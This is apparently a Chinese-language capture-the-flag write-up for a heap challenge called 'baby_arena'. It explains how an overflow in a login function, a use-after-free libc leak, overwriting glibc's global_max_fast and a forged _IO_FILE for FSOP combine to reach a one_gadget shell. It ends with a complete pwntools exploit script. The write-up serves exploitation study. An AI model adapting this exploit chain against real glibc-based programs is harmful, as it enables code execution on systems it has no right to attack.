漏洞位置

在login函数中v3变量大小只有8，输入了0x10造成了溢出，溢出到v4造成了任意地址写，不过只能写成admin或者clientele。

login

漏洞利用

首先有个alloc_check函数限制了申请的堆大小在0x96和0x176F之间，也就是在fastbin之外。

alloc_check 在delete函数中，free后的空间没有清空。
delete 由此结合后面的view函数可leak出libc基址，并且获得global_max_fast的地址。然后触发login中的任意地址写，将clientele写到global_max_fast的地址，可以将fastbin的最大值改成特别大，最后算好偏移，将一个很大的构造好可以触发FSOP的fake_file free到IO_list_all的地方，最后在exit时触发FSOP执行one_gadget起shell。

• global_max_fast是main_arena中控制最大fastbin大小的变量。
• fastbin在根据大小不同，分别链到main_arena中的fastbinY数组中，数组大小为10，若修改global_max_fast之后，更大的fastbin将会根据偏移来计算链到的位置，而超出原本fastbinY规定的位置，到达bins甚至更后面的File结构体。
• FSOP贴个链接吧，大概就是当程序在干下列事情之一时：
  1.当libc执行abort流程时
  2.当执行exit函数时
  3.当执行流从main函数返回时
  会调用_IO_flush_all_lockp函数，在调用次函数时，当满足以下条件时：
  1._IO_FILE -> _mode <= 0
  2._IO_FILE -> _IO_write_ptr > _IO_FILE -> _IO_write_base
  又会执行_IO_OVERFLOW(_IO_FILE_plus , EOF)函数，其中提到的我们劫持_IO_list_all的指针后(_IO_list_all中存放了_IO_FILE的值)，下面的_mode、_IO_write_ptr、_IO_write_base皆是该结构体上的变量，其中_IO_OVERFLOW函数，是存在于_IO_FILE_plus.vtable上偏移为0x18的函数指针，_IO_FILE_plus.vtable也是在该结构提上的指针。以上变量自己按着偏移去构造就行了。值得注意的是，当通过chunk劫持了_IO_list_all的指针后，由于指针指的是堆快的首地址，所以算偏移时需要减去堆头的大小。

my-exp.py

from pwn import *
local = 1
one_gadget = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147]
if local:
    p = process('./baby_arena')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
    print 'time is up;'

def create(size , note):
    p.recvuntil('exit\n')
    p.sendline('1')
    p.recvuntil('size\n')
    p.sendline(str(size))
    p.recvuntil('note\n')
    p.sendline(note)
    p.recvuntil('is\n')
    note_is = p.recvuntil('\n')[:-1]
    p.recvuntil('successed\n')
    return note_is

def delete(id):
    p.recvuntil('exit\n')
    p.sendline('2')
    p.recvuntil('id:\n')
    p.sendline(str(id))
    p.recvuntil('order!\n')

def login(name , is_admin):
    p.recvuntil('exit\n')
    p.sendline('3')
    p.recvuntil('name\n')
    p.sendline(name)
    p.recvuntil('admin\n')
    p.sendline(str(is_admin))

def debug():
    print pidof(p)[0]
    raw_input()

#make fake_file to trigger FSOP
fake_file = 'a' * (0x20 - 0x10)     #padding
fake_file += p64(0)                 #write_base => offset_0x20
fake_file += p64(1)                 #write_ptr  => offset_0x28
fake_file += 'b' * (0xb8 - 0x28)    #padding
fake_file += p64(0)                 #mode       => offset_0xc0
fake_file += 'c' * (0xd0 - 0xc0)    #padding
fake_file += p64(0x6020b0 - 0x18)   #vtable     => offset_0xd8

#leak libc_base and get some important addr
create(0xa0 , '1' * 0xa0)           #0
create(0xa0 , '2' * 0xa0)           #1
create(0x1400 , fake_file)          #2  free to fastbin and overwrite IO_list_all
delete(0)
leak = create(0xa0 , '3' * 8)
libc.address = u64(leak[8:].ljust(8 , '\x00')) - 0x3c4b78
global_max_fast_addr = libc.address + 0x3c67f8
IO_list_all_addr = libc.symbols['_IO_list_all']
success('libc_base => ' + hex(libc.address))
success('global_max_fast => ' + hex(global_max_fast_addr))
success('IO_list_all => ' + hex(IO_list_all_addr))

#overwrite global_mas_fast and free chunk2 to overwrite IO_list_all to fake_file 
login(p64(libc.address + one_gadget[1]) + p64(global_max_fast_addr - 8) , 0)
p.recvuntil('wrong choice\n')
delete(2)
#debug()

#exit() and exec one_gadget to get shell
p.recv(1024)
p.sendline('4')
p.interactive()